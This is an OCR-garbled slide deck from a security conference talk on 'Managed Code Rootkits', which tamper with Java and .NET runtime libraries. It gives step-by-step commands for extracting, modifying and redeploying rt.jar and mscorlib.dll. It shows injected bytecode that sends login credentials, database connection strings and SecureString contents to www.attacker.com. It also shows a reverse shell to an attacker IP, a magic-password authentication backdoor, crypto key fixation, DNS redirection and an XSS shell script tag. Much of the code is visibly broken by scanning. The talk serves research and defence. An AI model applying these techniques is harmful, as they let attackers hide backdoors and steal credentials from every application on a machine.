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DEMO - println(string s) goes crazy 

..or how to make code do more than it should 

Trivial question: 

What should be the output of the following (Java) code? 



class HelloWorld { 

public static void main(String args[]) { 
System.out.println("Hello World!"); 



I ~ C:\WINDOWS\system32\cmd.exe 

E:\Rootkits\Demo\println Twice >jaua HelloWorld 
Hello World* 
Hello World? 

E:\Jtootkits\Demo\println Twice > 



That was a simple PoC of runtime language modification 
"printlnO" was modified to print every string twice 
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Background 



I started playing with the idea of Managed Code language 
modification back in 2008 

Wrote a whitepaper titled " .NET Framework Rootkits - 
Backdoors inside your Framework" 

• Presented in BH EU 2009 & CanSecWest 

■NET Rootkits was a case study of the Managed Code 
Rootkit concept 

Today we'll talk about the general concept and take a look 
at Java Rootkits as well 
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What is managed code? 

Code that executes under the management of an application virtual 
machine , a.k.a "the sandbox" 

• Think of it as an "applicative OS" for apps 

• Example: Java Virtual machine (JVM) 

• Hiah level intermediate assemblv lanauaae 



• As opposed to unmanaged code (example: C/C++) which is 
executed directly by the CPU 

Write once, run everywhere 

• Managed code is independent of the underlying platform. 

• The VM acts as a machine specific "bridge" 

• Same code can run on Windows, Linux, Mac, Mainframe, 
mobile phone, database, car, toaster.. 
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Managed code platform examples 



Examples of application VM used in managed code 
platforms 

• Java Virtual Machine (JVM) 

• .NET Framework (CLR) 

• PHP (Zend Engine) 

• Flash Player /AIR - ActionScript Virtual Machine (AVM) 
Python 

• Dalvik virtual machine (Google Android) 

• SQLite virtual machine (VDBE) 

• Perl virtual machine 
Xc... 

Java & .NET were chosen as case studies 

• Execution model similar to each other and to other platforms 

• Used today by most new development projects 
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Machine 
soecific code 
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Application level rootkits, hidden inside the managed code 
environment libraries 

Their target - the managed code runtime (the VM) providing services 
to the upper level applications 

MCR influence is on the upper level application, controlling all apps 

• Traditional rootkits usually hide some information from the OS 

• Hiding their presence 

• Hiding files, processes, registry keys, ports, etc... 

• MCR can do the same, but by hiding from the applications 



• MCR can also cause sophisticated logical behavior modification 
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MCR advantages 



An ideal, overlooked place for malicious code hiding 

• No (current) AV / IPS understands intermediate language bytecodes 

• Same goes for forensics techniques 

• Developers backdoors are hidden from code review audits 

Universal rootkit - rely on the VM's generation of machine specific code for 
different platforms 

Large attack surface - VM's are Installed/preinstalled on almost every machine 

High success rate - one deployment can control all applications 

Managed code becomes part of the OS (Example: .NET PowerShell cmdlet's) 

Sophisticated attacks enabler 



• Low level access to important methods 

• Timing 

• Object Oriented malware 
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From language modification 



Qfl 



User 



Application 



Java 






Microsoft 



.net 1 1// 



£ python 




Runtime Class 
Libraries 




static void Main(string[] args) 
{ //DO SOMETHING 

//EXAMPLE: call RuntimeMethod 

RuntimeMethodQ; 



public void RuntimeMethod () 

{ //The implementation of RuntimeMethod () 

//Implementation code 

// 




OS APIs and services 






Example Code 

The WriteLine(s) double printing PoC (.NET) 



Original code of WriteLine: 



method public hidebysig static void Wri teLi ne £stri ng 'value') ci 1 managed 
maxstack S 



{ 



IL_0000: call class System. 10. TextWri ter System. Consol e :: get_Out Q 

IL_0005: Idarg. 

IL_0006 : callvirt instance void System. 10. TextWri ter: : Wri teLi neCstringjj 



IL_000bf: ret \ 

} // end of method Consol e : :Vri teLi ru 



Modified code: 



rint #2 (duplicate) 



method public hidebysig static v^i 
.maxstack S 



{ 



Wri teLi ne £s t ri ng \val ue ' j ci 1 manager 



IL_0000 
IL_0005 
IL_0006 



call class System. 10. TextWri ter System. c\nsol e : :get_OutQ 

1 darg . 

callvirt instance voi d System. 10. TextWri ter : : WVi teLi ne £s t ri ng)| 



IL_000b 
IL_0010 
IL_0011 



call class System. 10. TextWri ter System. Consol e : :get_OutQ 

1 darg . 

callvirt instance voi d System. 10. TextWri ter : : Wri teLi ne £s t ri ng)| 



IL_001b: ret 
} // end of method Consol e :: Wri teLi ne 
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Attack Scenarios 



Messing with the sandbox usually requires admin privileges (ACL restriction) 

Scenario #1 - Attacker gains admin access to a machine by exploiting an 
unpatched vulnerability 

• Housekeeping attack vector 

• Alternative post exploitation attack vector for rooted machines 

Scenario #2 - The "trusted insider" threat - trusted employee who abuses his 
admin privileges on the attacked machine 

• Here we're talking about Developers, IT Admins, DBA's, etc. 

What's next? 

Attacker installs a MCR, capable of 

• Hide processes 

• Hide files 
' Hide network connections 

• Install a backdoor for future access to the system 

• Manipulate sensitive application logic 
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Implementation techniques 



MCR's act as a part of the sandbox so they have access to low level, 
private methods 

They can change the virtual machine's implementation 

Non evasive f'bv desian") 



• AOP - Aspect programming (dynamic weaving) 
Configuration modification 

• Setting an alternative evil ClassLoader 

• Loading a malicious agent "-javaagent:MyEvilAgent.jar" (Java) 

• Library location tampering of "machine. config" (.NET) 
Evasive 

• Direct modification of the library intermediate bytecode 

Using evasive techniques, the application cannot detect the presence 
of a rootkit. The modified sanbox "lies" to the application. 
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Java Root kits 

an example of evasive technique implementation 

Overview of Java JVM modification steps 

Locate the class (usually in rt.jar) and extract it: 

jar xf rt.jar java/io/PrintStream. class 

• Dissassemble it (using Jasper disassembler) 

Java -jarjasper.jar PrintStream. class 

Modify the bytecode 

• Assemble it (using Jasmin assembler) 

Java -jar jasmin. jar PrintStream. j 

• Deploy the modified class back to its location: 

jar uf rt.jar java/io/PrintStream. class 
For more information: 

htto://www. aoDlicationsecuritv. co.il/ J a va-Rootkits. asox 
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I .NET Rootkits 

an example of evasive technique implementation 

Overview of .NET Framework modification steps 
• Locate the DLL in the GAC, and disassemble it 

ILDASM mscorlib.dll /OUT=mscorlib.dll.il /NOBAR /LINENUM /SOURCE 

Modify the MSIL code, and reassemble it 

ILASM /DEBUG /DLL /QUIET /OUTPUT=mscorlib.dll mscorlib.dll.il 

Force the Framework to use the modified DLL 



Avoiding NGEN cached Native DLL 

ngen uninstall mscorlib 

Remove traces with NGEN 



More info can be obtained at the ".NET Rootkits" whitepaper ( http:// 

www.applicationsecurity.co.il/.NET-Framework-Rootkits.aspx ) and the BlackHat 

Europe slides 
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Add "malware API" to classes 

the building blocks 



A.K.A. Method injection 

Extend the runtime environment with general purpose 
"malware API" implemented as new methods 

• Used by payload code - Deploy once, use many times 

• Parameter passing 

Some examples 

private void SendToUrl(string url, string data) 

• private void ReverseShell(string ip, int port) 

• private void HideFile (string fileName) 

• private boolean InjectClass (Class maliciousClass) 

• private Socket MitM (string victimURL, int port, string attackerURL) 
Public void KeyLogEventHandler (Event e) 

A/ill be used later on 
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Attacking the "Object" class 



Object Oriented and inheritance play their role 

All classes automatically extend the class "Object" 

• They inherit its member variables & methods 

Object contains generic code that is shared among all the other 
objects 

Injecting a new method to "Object" class will influence ALL 
existing classes 

» Example: report current object variables to attacker 

private void SendVariables(string attackerAddress) 
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Malware development scenarios 



Changing a language class libraries can lead to some very 
interesting attacks 

• Code manipulation, API Hooking 

• Authentication Backdoors 

• Sensitive data theft 

• Resource hiding (file, process, port...) 

• Covert Channels / reverse shells 

• Proxy (bouncer), DNS fixation, MitM.. 

• Polymorphism attacks 

• Disabling security mechanisms 

Remember, we are hiding it from apps running inside the 
sandbox, not from the OS 

We are messing with the sandbox 
Let's talk about some examples... 
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Stealing from inside of Authenticate!) - used by all applications 
Send the credentials to the attacker url 
• We can use our SendTollrlQ, to send the info to the attacker 



Original code 



Post injected 



ForitsAuthentication : : Authenticate 



Modified code(post injection) 



IL 0033: ldloc.O 



/////appended code - call SendToUrl 

IL0834: ldstr "http://www.attacker.con/CookieStealer/WebForii1.a5p" 
+ "x\?s=" 
ILJ039: ldarg.8 
ILJ03a: ldstr ":" 

ILJ03f: ldarg.1 
ILOO40: call string [nscorlibJSysten. String: :Concat(string, 

string,string)| 

IL 0045: call uoid Sijsten.Web .Security ■Formsfluthentication::SendToUrl( 

string, 

/////end appended code - call SendToUrl 



ILJO^a: ret 
} // end of method FornsAuthentication: 



Authenticate 
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DEMO 

Hooking into x TormsAuthentication::Autheticate()" (.NET) 

Stealing authentication credentials from login pages 

httD://www.RichBank.com/formsauthentication/Loain.asDX 



www.RichBank.com (victim) 



Login page 



Login 



protected void btnLogln_CHcl<(obJact sender, EvantArgs e) 
if [ FormsAuthentication.Autbenticate tuser. password)) 



Runtime VM 




jcol Authenticate^!- re ranne . striisi password) ( 



//original code... 

SendTaUri {"www.attaeker.ctim", name+passwbrd) 






User A 



Username+Password 




UserC 



Www, Atta eke r . com 



Authentication backdoors 



Another attack on AuthenticateQ method - authentication 
backdoors 

Conditional authentication bypass 

• Example - "MagicValue" (Decompiled): 



Original 
code 
starts 
here 



, FORMS_AUTH_SUCCESS^ 



FORMS_AUTH_F 



: em Event ( 




Injected 
code 



ldarg.1 

Idstr "Magic! " 

callvirt instance bool 



IL_0000: 
IL_0001: 
IL_0006: 

[mscorlib] system. string: : Equals (string) 



lL_000b 
IL_000d 
lL_000e 
IL_000f 
IL_0011 
IL_0012 
IL_0013 
IL_0015 



brfalse.s IL_QQ15 

ldc.i4.1 

stloc. 

br.s IL_0020 

ldc.i4.0 

stloc. 

br.s IL_003 5 

ret 
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Reverse Shell 

Encoded version of netcat (MSIL array, dropandpop) 
Deployed as public method+private class 



Example - trigger - connect on Application::Run() 



Original code 



.method public hidebysig static uoid 
mainForm) cil managed 

{ 
// Code size 18 (0x12) 



Runfclass System. Windows. Forms. Form 

Pre injection 



class System. Windows. Forms. ApplicationContext) 
ILJ011: ret 
} // end oF method Application: :Run 



Modified code (ore injection' 




.method public hidebysig static uoid 
mainForm) cil managed 

i 
// nnrtP gJ7P !Liflil2J 



Runfclass System. Uindows. Forms. Form 



.maxstack 8 

ILJ000: call class System. Windows. Forms. Application/ThreadContext 
System. Windows. Forms. Application/ThreadContext ::FromCurrent() 

ILJ005: Idc.i4.m1 

ILJ006: ldarg.0 

IL0007: newobj instance uoid System.Windows.Forms.ApplicationContext::. 
ctor (class System. Windows. Forms. Form) 

ILJOOc: calluirt instance uoid System. Windows. Forms. Application/ThreadCon 
text::RunMessageLoop(int32, 




_ //added code 
^ ILJ0O0 
ILJ0O5 
ILJ006 
string, int32) 
////end added code 



call reuerse shell 
ldstr 
ldc.iU 
call 



0xUd2 
uoid 



.50.129" //attacker machine 

//port 1234 
System. Windows. Forms. Application ::ReuerseShell( 



call reuerse shell 



ILOOOb : call class System. Uindows. Forms. Application/ThreadContext 
System. Uindows. Forms. Application/ThreadContext ::FromCurrent() 

ILJ010: Idc.i4.m1 

ILJ011: ldarg.0 

IL0012: newobj instance uoid System.Uindows.Forms.ApplicationContext::. 
ctor (class System. Windows. Forms. Form) 

IL0017: calluirt instance uoid System. Windows. Forms. Application/ThreadCon 
text::RunMessageLoop(int32, 

class System. Windows. Forms. ApplicationContext) 
ILJ01c: ret 
} // end oF method Application ::Run 
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Crypto attacks 



Tampering with Cryptography libraries 

• False sense of security 
Some scenarios: 

Key fixation and manipulation 

Key stealing (example - SendToUrl(attacker,key) ) 

• Algorithm downgrading (AES -> DES, etc..) 
Example - GenerateKeyQ key fixation: 



Ipublic override void GenerateKeyQ 

|{ 

base.keyValue = System. Text. ASCIIEncodi ng. ASCII. GetBytes ("FIXED_KEY") ; 



Modified 



Black Hat Briefings 



f^eecMitat^ 



DNS manipulation 



Manipulating DNS queries / responses 
Example (Man-ln-The-Middle) 

• Fixate the runtime DNS resolver to return a specific IP address, controlled 
by the attacker 



■J!l?^|[cfs^g[»MrAU[»ltsWctcMM»HUHfMtl 



• All communication will be directed to attacker 
Affects ALL network API methods 
Example: resolve victim -> attacker 
Injected code: 



aload_0 ;load s into stack 

Idc "www. ForexQuoteserver . com" 

invokevirtual ; compare the 2 strings 

] ava/1 ang/stri ng/equal s (i_] ava/1 ang/ob] act ; )z 

ifeq i_ABEL_compare 

Idc "www. attacker. com" 

astore_Q ; store attacker hostname to stack 

LABEL_compare: 



I n ^+ Arlrl ra o o 



5 - www.ciuciUKer.uurn ; 

return getAIIByName(s)[0]; 
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DEMO 

"InetAddress::getByName()" conditional IP fixation (JAVA/Linux) 

Modified classes are platform independent 

We will deploy the same class used on Win on a linux machine 





<3 



Victim Machine 



BT4 Linux 



Mitm "Forex" server 



www.attacker.com 



Forex Server! 



www.ForexQuoteServer.com (local) 



Forex Server 
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Stealing connection strings 

SqlConnection::Open() is responsible for opening DB 
connection 

• "ConnectionString" variable contains the data 

• Open() is called, ConnectionString is initialized 
Send the connection string to the attacker 

public override void Open() 

< 

SendToUrlfwww.attacker.com", this. ConnectionString); 

//original code starts here 
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Permanent HTML/JS injection 

Tamper with hard-coded HTML/Javascript templates 
Inject permanent code into code templates 

• Permanent XSS 

• Proxies / Man-in- the- Middle 

• Defacement 

• Browser exploitation frameworks 

• Example - injecting a permanent call to XSS shell 



<script src=" http://www.attc 



/xssshell .asp?v=1 23"></script> 
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Pick into SecureString data 

ln-memory encrypted string for sensitive data usage (.NET) 
• It orobablv contains valuable data ! 



Example - extract the data and send it to the attacker (decompiled): 

IntPtr ptr = System. Runtime. InteropServices. Marshal. SecureStringToBSTR(secureString); 

SendToUrlfwww.attacker.com", 

System. Runtime. InteropServices. Marshal. PtrToStringBSTR(ptr)); 
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Disabling security mechanisms 



Java JAAS (Java Authentication & Authorization Service) / .NET CAS (Code 
Access Security) are responsible for runtime code authorizations 

grant CodeBase "http://www.example.com", 

Principal com.sun.security.auth.SolarisPrincipal "duke" { permission 
java.io.FilePermission "/home/duke", "read, write"; 

}; 

Security logic manipulation 

• Example - messing with Demand() 

• CodeAccessPermission.FilelOPermission, RegistryPermission, Principal.. 



Effect - Applications will not behave accordina to declared 



settings 

• False sense of security (code seems to be restricted!!) 
' Configuration audit is useless 



tolic 
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Advanced topics 



Cross platform modified class can run on different platforms 

"One class to rule them all, One class to find them, One class to 
bring them all and in the darkness bind them" 

What about other Runtimes? 

ESB? Web Service stacks? Application Servers? Databases? 
SilverLight? PowerShell? 

Their behavior can be changed 

Multiple, chained rootkits / second order rootkits 

1 . OS level rootkit covering up the traces of MCR (file size, 
signature..) 

2. VM level MCR covering its traces from the application 
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General purpose .NET DLL modification tool 
Able to perform all previous steps 

• Extract target DLL from the GAC 

• Perform complicated code modifications 

• Generate GAC deployers 

Easy to extend by adding new code modules 

Most of the discussed attacks have a .NET-Sploit PoC 
module implementation 
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.NET-Sploit module concept 

Generic modules concept 

• Function - a new method 

• Payload - injected code 

• Reference - external DLL reference 

• Item - injection descriptor 
Comes with a set of predefined modules 
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Item example 



Target 



<CodeChangeltem name- 'print twice"> 

<Description>change WriteLine() to print every string twice</Description> 



Location 



<AssemblvLocation> c:\WINDOWS\assemblv\GAC 32\mscorlib\2.0.0.0 b77a5c561934e089 

</AssemblyLocation> 



Injected Code 



<AssemblyCode> — ■ — ^ 

(payload/flinc) <FileName> writeline twice.pavload </FileName> 

<Location> 



Hooking point 



</Location> 

<StackSize> 8 </StackSize> 



</AssemblyCode> 



</CodeChangeltem> 
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Mode 
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DEMO - .NET-Sploit 

Targeted reverse shell (-NET) 

Open a reverse shell to the attacker's machine when a specific 
application ("SensitiveApplication.exe") is executed 

.NET-Sploit will inject the following code: 

• General purpose ReverseShell() method 

• Loader code - into the Framework "Run()" method 





Incoming - BLOCKED 
Outgoing - ALLOWED 
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Call for action 

AV/HIPS vendors - Block Runtime tampering attempts 

IT - File tampering detectors (external tripwire) 

Auditors/testers - know about this malware hiding place 

Forensics - look for evidence inside the runtime VM 

Developers - your app is secure as the underlying 
runtime VM 

VM Vendors -Although it's not a bulletproof solution - 
Raise the bar. It's too low! 

End users -verify your Runtime libraries! 
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Summary 



Malicious code can be hidden inside an application runtime VM 

It is an alternative place for malware deployment besides the 
Kernel, BIOS, Drivers, etc.. 

• It is an alternative place for backdoors 

Can lead to some very interesting attacks 

It does not depend on specific vulnerability 

It is not restricted only to Java or .NET 

.NET-Sploit, a generic language modification tool, simplifies the 
process for .NET but can be extended to other platforms 
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